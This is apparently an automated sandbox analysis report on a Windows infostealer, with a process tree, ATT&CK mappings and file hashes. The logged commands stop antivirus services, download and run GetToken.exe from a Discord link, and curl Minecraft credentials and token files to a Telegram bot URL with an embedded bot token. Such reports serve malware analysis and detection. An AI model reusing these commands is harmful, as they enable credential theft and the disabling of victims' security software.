C:\Windows\system32\net.exe
net stop "ViRobot Professional Monitoring" /y
2⤵
PID:4344

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "ViRobot Professional Monitoring" /y
3⤵
PID:3464

C:\Windows\system32\net.exe
net stop "PC-cillin Personal Firewall" /y
2⤵
PID:260

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "PC-cillin Personal Firewall" /y
3⤵
PID:220

C:\Windows\system32\net.exe
net stop "Trend Micro Proxy Service" /y
2⤵
PID:372

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Trend Micro Proxy Service" /y
3⤵
PID:4668

C:\Windows\system32\net.exe
net stop "Trend NT Realtime Service" /y
2⤵
PID:3832

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Trend NT Realtime Service" /y
3⤵
PID:3732

C:\Windows\system32\net.exe
net stop "McAfee.com McShield" /y
2⤵
PID:4868

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfee.com McShield" /y
3⤵
PID:1516

C:\Windows\system32\net.exe
net stop "McAfee.com VirusScan Online Realtime Engine" /y
2⤵
PID:2452

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "McAfee.com VirusScan Online Realtime Engine" /y
3⤵
PID:3788

C:\Windows\system32\net.exe
net stop "SyGateService" /y
2⤵
PID:2456

C:\Windows\system32\net.exe
net stop "Sygate Personal Firewall Pro" /y
2⤵
PID:3956

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
3⤵
PID:3652

C:\Windows\system32\net.exe
net stop "Sophos Anti-Virus" /y
2⤵
PID:4356

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Anti-Virus" /y
3⤵
PID:3468

C:\Windows\system32\net.exe
net stop "Sophos Anti-Virus Network" /y
2⤵
PID:3252

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sophos Anti-Virus Network" /y
3⤵
PID:2744

C:\Windows\system32\net.exe
net stop "eTrust Antivirus Job Server" /y
2⤵
PID:3316

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "eTrust Antivirus Job Server" /y
3⤵
PID:4616

C:\Windows\system32\net.exe
net stop "eTrust Antivirus Realtime Server" /y
2⤵
PID:3188

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "eTrust Antivirus Realtime Server" /y
3⤵
PID:1992

C:\Windows\system32\net.exe
net stop "Sygate Personal Firewall Pro" /y
2⤵
PID:2292

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Sygate Personal Firewall Pro" /y
3⤵
PID:3624

C:\Windows\system32\net.exe
net stop "eTrust Antivirus RPC Server" /y
2⤵
PID:1096

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "eTrust Antivirus RPC Server" /y
3⤵
PID:4796

C:\Windows\system32\net.exe
net stop netsvcs
2⤵
PID:1384

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop netsvcs
3⤵
PID:3160

C:\Windows\system32\net.exe
net stop spoolnt
2⤵
PID:4420

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop spoolnt
3⤵
PID:4108

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K 2b2crypt.cmd
2⤵
PID:1600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K 2b2crypt.m.cmd
2⤵
PID:5040

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=
2⤵
PID:1084

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=
2⤵
PID:1848

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=
2⤵
PID:3604

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=
2⤵
PID:3560

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=
2⤵
PID:5016

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=
2⤵
PID:3756

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=
2⤵
PID:2388

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=
2⤵
PID:4072

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=
2⤵
PID:5076

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=
2⤵
PID:3616

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port " dir=in action=allow protocol=UDP localport=
2⤵
PID:4496

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="UDP Port " dir=out action=allow protocol=UDP localport=
2⤵
PID:4172

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K attk1usb.cmd
2⤵
PID:1452

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K attk2usb.cmd
2⤵
PID:364

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\loveletter.vbs"
2⤵
PID:3564

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\mail.vbs"
2⤵
PID:2876

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K spreadusb.cmd
2⤵
PID:3476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K spreadusb.cmd
2⤵
PID:2092

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/974798125011198003/976939955140038656/GetToken.exe', 'GetToken.exe')"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1520

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table >C:\Users\Admin\Documents\apps.txt"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3700

C:\Users\Admin\Documents\GetToken.exe
GetToken.exe
2⤵
- Executes dropped EXE
PID:3344

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-Webrequest https://ipv4.wtfismyip.com/text"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1152

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "Get-ComputerInfo"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1016

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Get-ComputerInfo"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1296

C:\Windows\system32\tasklist.exe
tasklist
2⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4872

C:\Windows\system32\curl.exe
curl -s -v -F document=@"apps.txt" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
2⤵
PID:1864

C:\Windows\system32\curl.exe
curl -s -v -F document=@"userdata.txt" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
2⤵
PID:1052

C:\Windows\system32\curl.exe
curl -s -v -F document=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_msa_credentials.bin" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
2⤵
PID:4172

C:\Windows\system32\curl.exe
curl -s -v -F document=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_msa_credentials_microsoft_store.bin" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
2⤵
PID:2324

C:\Windows\system32\curl.exe
curl -s -v -F document=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_accounts.json" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
2⤵
PID:3564

C:\Windows\system32\curl.exe
curl -s -v -F document=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_accounts_microsoft_store.json" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
2⤵
PID:2740

C:\Windows\system32\curl.exe
curl -s -v -F document=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_product_state.json" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
2⤵
PID:3852

C:\Windows\system32\curl.exe
curl -s -v -F document=@"C:\Users\Admin\AppData\Roaming\.minecraft\launcher_profiles.json" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
2⤵
PID:5100

C:\Windows\system32\curl.exe
curl -s -v -F document=@"Tokens.txt" https://api.telegram.org/bot5382169434:AAFYrP7AuQ_-UWP0BUDD5454RCW7BJ2-rQM/sendDocument?chat_id=-655682538
2⤵
PID:3136

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Get-Content -Path C:\Users\Admin\Desktop\YcynNote.txt | Out-Printer"
2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1868

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "norton AntiVirus Client" /y
1⤵
PID:2324

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SyGateService" /y
1⤵
PID:2044

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc
1⤵
PID:2284

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Hidden Files and Directories

T1158

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Hidden Files and Directories

T1158

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Process Discovery

T1057

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
8f954c86495f1256b9f20046a0b487d3

SHA1
b40ac4b22b07611c5c34efedca97fc5a8319e9b7

SHA256
94cf031ea1a632617548db0089091413f4cbb71ce2048e0aab92f6866ab8306b

SHA512
f67333df900d13eef6e01ca6fd2e52efe20a5c85ee6ce43d67f55ef913049149df696e045f45dc614d564afa4b457b365b915dd720b9da369b089ac9cb9b6cea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
8c463c0d2e5e09dfe4780a7c68876f45

SHA1
b68c88c25a1cfe0612bb265b6c8436ad7d534da3

SHA256
305fe1882cc0a2d7a3d182cb8d8f73693993c2ecd680310cb5ca74b45b4376cc

SHA512
4930a93d84e4a8e024ee2bc83c82cd43674b4c242b5e98d5f8e6a84e0b2b990998dccd9d06962615767fbb5b6bd9633c70b15f197e81da856bba29c18d1791ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
1dffbab5ecc6d06e8b259ad505a0dc2a

SHA1
0938ec61e4af55d7ee9d12708fdc55c72ccb090c

SHA256
a9d2e6d35c5e9b94326042c6f2fe7ef381f25a0c02b8a559fc1ee888ccffb18e

SHA512
93209a16400574416f6f992c2d403acc399179fc911818c4967c9a0211924486878578d1c98ba3bc9e269012603c96ab118a291bf53c57d8af9ab48f9e7b9b76

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
fe065d0b9f6be1bb97b1a2cdb01bf4c7

SHA1
0f2e0fd87f0b5b9a44a25d222dd19ac8a97e4bd8

SHA256
c2be5ec0339a1095cc2d207ec107ce8ea80bf2fa6708393faf05f52a1514a008

SHA512
0e64459fcfe29d67aa23d6687bccfd431e7aa3601b7daf45139a67db5fdfaedb9835b7f37f49e43194b3efa471b3f684fafda950beaa143c9d07ade481181ba4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
c9afffd4c93dbf2fc830858e4840ed17

SHA1
ca6303fa16d60486fd08095bb49a073497ed61f2

SHA256
88e9b5ef68befe59f68f25769adb6af0cd4d8c372ee25a2feec45cb843de804e

SHA512
614c8ab791f8bfe09cfe6911f8d29da86d023b5b4ec7d103fb5d9517fb5545c9987df78e417293f18aad2c5c180b4e894c5b56857f7952c139721f7380f22802

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
4f483b4080f0043fa8851faad5fb55c3

SHA1
75f79addaa55568511c1300782fd8ddb99f8a8e2

SHA256
c2f9c0dc6119b6abedf3a6b5566900b02cdc591f42771cfca5d43313abc38c8f

SHA512
3f6a689ecfe2a9e4a22959e610c5c698e4856fc86461ce05a3e0aa35fa7994d54de02d2a70945bafe513b59f457d9cae9bac93b1aef7a70da1c6aeaed8dad0bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\Desktop\YcynNote.txt
Filesize
640B

MD5
b2c26154bdc669017e98aa54c9dc0c49

SHA1
18985b519126f4f6ca8c2f7db223a2a90dca5612

SHA256
a424f38d0d0dba797c24a6be515a75e6a0fd377e29d52343e67aa7c3e6b80ee8

SHA512
590178760a6cf734d025664187e257f10ea15520e28a090e16c2985e5a70ab46698d13d2ac5caf7aab4155bb4f3f863c6286f539b8f7e97d87b568f885acbe8d

Download Submit
C:\Users\Admin\Desktop\loveletter.vbs
Filesize
495B

MD5
900ead69492d80e48738921eca28b14f

SHA1
6b51607c54f8e734a7ea47091859c3e8dce6365c

SHA256
c1a49c4801603e877e673620c289d709c5c2b368dae72e941f9649889faefab3

SHA512
8fbb63ea9e5e2bca05bdbcf373056e58aaae2dfd180dfca2fdfdc2b706bb3923798f9878eddf7acef255676eda65f94cc9a827e8abcc9d4da6613f33d74861f2

Download Submit
C:\Users\Admin\Desktop\mail.vbs
Filesize
488B

MD5
88ef4bc3f48eeb97aedadff8f3840980

SHA1
48e8167bef2562d902885a075f6190d269fd3d35

SHA256
b62346a7425cfec83d3f05fc4ff268510a16493479f09e7113169aaad5abeefa

SHA512
523127a83202c86445825e1d8ab84a268e4f9b40a7c76b91b4947fb29de1c0819ba3e856bc1cbd40d6b0d10c04ca356a5e0dc975708a3d765ab425ab1a7d1024

Download Submit
C:\Users\Admin\Desktop\spreadusb.cmd
Filesize
140B

MD5
591248610b25d51736f91c45f788cf6e

SHA1
b810cf36ed55fa0ea44c2dafb273e2463fbbda56

SHA256
cc1baa061feaf3f747f2d932f077629579f5ce7ec6018bbede7a3220a090a5d1

SHA512
0cdbe0d5e2f618f9776cc698ca40d028e4cdbc24537179afde3eee08d13921907f34cedb30726858af36f5366d767a19180665053886646a187025e253912b99

Download Submit
C:\Users\Admin\Documents\2b2crypt.cmd
Filesize
138B

MD5
8a0e18e8c3724921943bd90e6070dc8e

SHA1
13ba409f261173c093918af6c786fe6d863164cf

SHA256
ac34f2c032a70571a4d51ca8de3c7cee1ba51aadbddb0534fb358e9b312d2ca6

SHA512
54c9e4aef02fb333c9e0af9dda2b2dbfe8bc9550f127051238d800e1e927e34ce272e457db591bbd6414d1fc703d5185ca557652e508e5dd3211a013cc85e34a

Download Submit
C:\Users\Admin\Documents\2b2crypt.m.cmd
Filesize
142B

MD5
28057d0514c31373a5e6135b7b477196

SHA1
719373c153c7a245bdcd6118330e38c15432eb20

SHA256
3179106c4ec0e5fe5129399101c20d79dc9504f29a6e5fdbb0b507fa75d9a9eb

SHA512
32952350e35b4ccb6115926ea117d3f8cc49d100a2e47a652f69b5c64f7cf2de2771d9b9b46f6d17cb30162e04022d280fb2d5a54ddd3c396b728623e4692596

Download Submit
C:\Users\Admin\Documents\GetToken.exe
Filesize
8KB

MD5
2ed86e80ea9b4b95b3e52ed77ea6c401

SHA1
5032e67b7c84362374b7d52507ab83ae03d7ebff

SHA256
6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983

SHA512
64fa72aea094f6aa03d9f6dcee3f72ce156a5a7802c39c59af5fc637e72303d46740f0c022fbd4c9f1ec62300ee33cc0af2ac0622729ae67717f580e007e6e71

Download Submit
C:\Users\Admin\Documents\GetToken.exe
Filesize
8KB

MD5
2ed86e80ea9b4b95b3e52ed77ea6c401

SHA1
5032e67b7c84362374b7d52507ab83ae03d7ebff

SHA256
6ad08fe301caae18941487412e96ceb0b561de4482da25ea4bb8eeb6c1a40983

SHA512
64fa72aea094f6aa03d9f6dcee3f72ce156a5a7802c39c59af5fc637e72303d46740f0c022fbd4c9f1ec62300ee33cc0af2ac0622729ae67717f580e007e6e71

Download Submit
C:\Users\Admin\Documents\NoKeyB.exe
Filesize
1.2MB

MD5
6bc9c0340385a1ff2a8dd1b841415211

SHA1
f7b4088b012271ed06c24392bbcb5f9eb75219c2

SHA256
9df4d035d4d53d22fb29b5288336a05041e85fd448bb20ffe026b61bea52cf13

SHA512
9bebb00be1fef4e9ac739d4a0ef64a3d8e789cd4d87d9f98fc9813c2b15b84549319275fc6f294a50436fd6843df868b202e40b59ba0081a7a6eda797828fdea

Download Submit
C:\Users\Admin\Documents\NoKeyB.exe
Filesize
1.2MB

MD5
6bc9c0340385a1ff2a8dd1b841415211

SHA1
f7b4088b012271ed06c24392bbcb5f9eb75219c2

SHA256
9df4d035d4d53d22fb29b5288336a05041e85fd448bb20ffe026b61bea52cf13

SHA512
9bebb00be1fef4e9ac739d4a0ef64a3d8e789cd4d87d9f98fc9813c2b15b84549319275fc6f294a50436fd6843df868b202e40b59ba0081a7a6eda797828fdea

Download Submit
C:\Users\Admin\Documents\Tokens.txt
Filesize
22B

MD5
3d74b4a3f6053a5a252f4faee7fb157e

SHA1
576c1a2892dad89c3b6aba698ee67258be827eaf

SHA256
445f09c32e44ec144320d929de814ceda449da7efa062a19c1cc78cde29fb139

SHA512
dab16b5c564af14fb632f086b99530061d86f54cffed6bfa1b9ae59f97b77beec8ae89c132e2a217d555df512c75bb236921014ac0ff8053c88af16a96db7529

Download Submit
C:\Users\Admin\Documents\apps.txt
Filesize
8KB

MD5
6bf4cd4f0d7fe6d03030441cc05d10bc

SHA1
cc7017ae89ccd9881675d1374520c73ebfc09ca4

SHA256
d96b64543b6a19c6a9e660950d348f1690486ef2a68879f1694cac46158cb106

SHA512
fac10fd326830c2247497c59e2f6b391eb34c34bef5baa4a9ec12f60a4aa0342a9d18d81afeb0f476077dfbd6cfd9a3ce313b3f6a1dcb6d968a20c9856c4b883

Download Submit
C:\Users\Admin\Documents\userdata.txt
Filesize
32KB

MD5
819bf2741599fe893802d13bd509d8aa

SHA1
7962843d92c348e070f247f62f0eabad44b516f4

SHA256
e58d567b78941cf8cf5543c77689270ce00cc2cb2307ce6a63adba7eeddd4692

SHA512
ed2a1f14e87acc16d7e915263be81e90004fd5419372f8a290389b64ac95aa5653cf746ee57282e5a89a8af825ad41d1d77d03e57178454e7acdaa6198cafd54

Download Submit
memory/220-160-0x0000000000000000-mapping.dmp

Download
memory/372-159-0x0000000000000000-mapping.dmp

Download
memory/740-191-0x0000000000000000-mapping.dmp

Download
memory/776-172-0x0000000000000000-mapping.dmp

Download
memory/836-141-0x0000000000000000-mapping.dmp

Download
memory/840-150-0x0000000000000000-mapping.dmp

Download
memory/876-189-0x0000000000000000-mapping.dmp

Download
memory/1016-217-0x00007FFE184F0000-0x00007FFE18FB1000-memory.dmp

Filesize
10.8MB

Download
memory/1020-165-0x0000000000000000-mapping.dmp

Download
memory/1132-183-0x0000000000000000-mapping.dmp

Download
memory/1152-184-0x0000000000000000-mapping.dmp

Download
memory/1152-214-0x00000269F3670000-0x00000269F3E16000-memory.dmp

Filesize
7.6MB

Download
memory/1152-213-0x00007FFE184F0000-0x00007FFE18FB1000-memory.dmp

Filesize
10.8MB

Download
memory/1252-175-0x0000000000000000-mapping.dmp

Download
memory/1296-219-0x00007FFE184F0000-0x00007FFE18FB1000-memory.dmp

Filesize
10.8MB

Download
memory/1332-162-0x0000000000000000-mapping.dmp

Download
memory/1384-186-0x0000000000000000-mapping.dmp

Download
memory/1388-187-0x0000000000000000-mapping.dmp

Download
memory/1460-149-0x0000000000000000-mapping.dmp

Download
memory/1508-161-0x0000000000000000-mapping.dmp

Download
memory/1516-163-0x0000000000000000-mapping.dmp

Download
memory/1520-205-0x00007FFE184F0000-0x00007FFE18FB1000-memory.dmp

Filesize
10.8MB

Download
memory/1552-156-0x0000000000000000-mapping.dmp

Download
memory/1560-153-0x0000000000000000-mapping.dmp

Download
memory/1792-148-0x0000000000000000-mapping.dmp

Download
memory/1836-147-0x0000000000000000-mapping.dmp

Download
memory/1868-224-0x00007FFE184F0000-0x00007FFE18FB1000-memory.dmp

Filesize
10.8MB

Download
memory/2028-151-0x0000000000000000-mapping.dmp

Download
memory/2040-198-0x0000000000000000-mapping.dmp

Download
memory/2044-168-0x0000000000000000-mapping.dmp

Download
memory/2096-155-0x0000000000000000-mapping.dmp

Download
memory/2260-152-0x0000000000000000-mapping.dmp

Download
memory/2340-166-0x0000000000000000-mapping.dmp

Download
memory/2432-199-0x0000000000000000-mapping.dmp

Download
memory/2476-158-0x0000000000000000-mapping.dmp

Download
memory/2700-157-0x0000000000000000-mapping.dmp

Download
memory/2780-194-0x0000000000000000-mapping.dmp

Download
memory/3244-179-0x0000000000000000-mapping.dmp

Download
memory/3292-197-0x0000000000000000-mapping.dmp

Download
memory/3316-177-0x0000000000000000-mapping.dmp

Download
memory/3344-215-0x0000000000C40000-0x0000000000C48000-memory.dmp

Filesize
32KB

Download
memory/3548-196-0x0000000000000000-mapping.dmp

Download
memory/3692-192-0x0000000000000000-mapping.dmp

Download
memory/3700-209-0x00007FFE184F0000-0x00007FFE18FB1000-memory.dmp

Filesize
10.8MB

Download
memory/3704-169-0x0000000000000000-mapping.dmp

Download
memory/3728-170-0x0000000000000000-mapping.dmp

Download
memory/3840-180-0x0000000000000000-mapping.dmp

Download
memory/4080-134-0x00007FFE1A080000-0x00007FFE1AB41000-memory.dmp

Filesize
10.8MB

Download
memory/4080-133-0x0000017038D80000-0x0000017038DA2000-memory.dmp

Filesize
136KB

Download
memory/4080-132-0x0000000000000000-mapping.dmp

Download
memory/4112-154-0x0000000000000000-mapping.dmp

Download
memory/4176-146-0x0000000000000000-mapping.dmp

Download
memory/4196-143-0x0000000000000000-mapping.dmp

Download
memory/4224-144-0x0000000000000000-mapping.dmp

Download
memory/4240-131-0x0000000000000000-mapping.dmp

Download
memory/4264-174-0x0000000000000000-mapping.dmp

Download
memory/4268-145-0x0000000000000000-mapping.dmp

Download
memory/4292-142-0x0000000000000000-mapping.dmp

Download
memory/4328-193-0x0000000000000000-mapping.dmp

Download
memory/4384-188-0x0000000000000000-mapping.dmp

Download
memory/4388-173-0x0000000000000000-mapping.dmp

Download
memory/4532-135-0x0000000000000000-mapping.dmp

Download
memory/4620-182-0x0000000000000000-mapping.dmp

Download
memory/4696-195-0x0000000000000000-mapping.dmp

Download
memory/4708-139-0x00007FFE1A010000-0x00007FFE1AAD1000-memory.dmp

Filesize
10.8MB

Download
memory/4708-137-0x0000000000000000-mapping.dmp

Download
memory/4720-190-0x0000000000000000-mapping.dmp

Download
memory/4820-178-0x0000000000000000-mapping.dmp

Download
memory/4868-164-0x0000000000000000-mapping.dmp

Download
memory/4888-185-0x0000000000000000-mapping.dmp

Download
memory/4924-171-0x0000000000000000-mapping.dmp

Download
memory/4936-130-0x0000000000000000-mapping.dmp

Download
memory/4948-167-0x0000000000000000-mapping.dmp

Download
memory/4996-181-0x0000000000000000-mapping.dmp

Download
memory/5008-176-0x0000000000000000-mapping.dmp

Download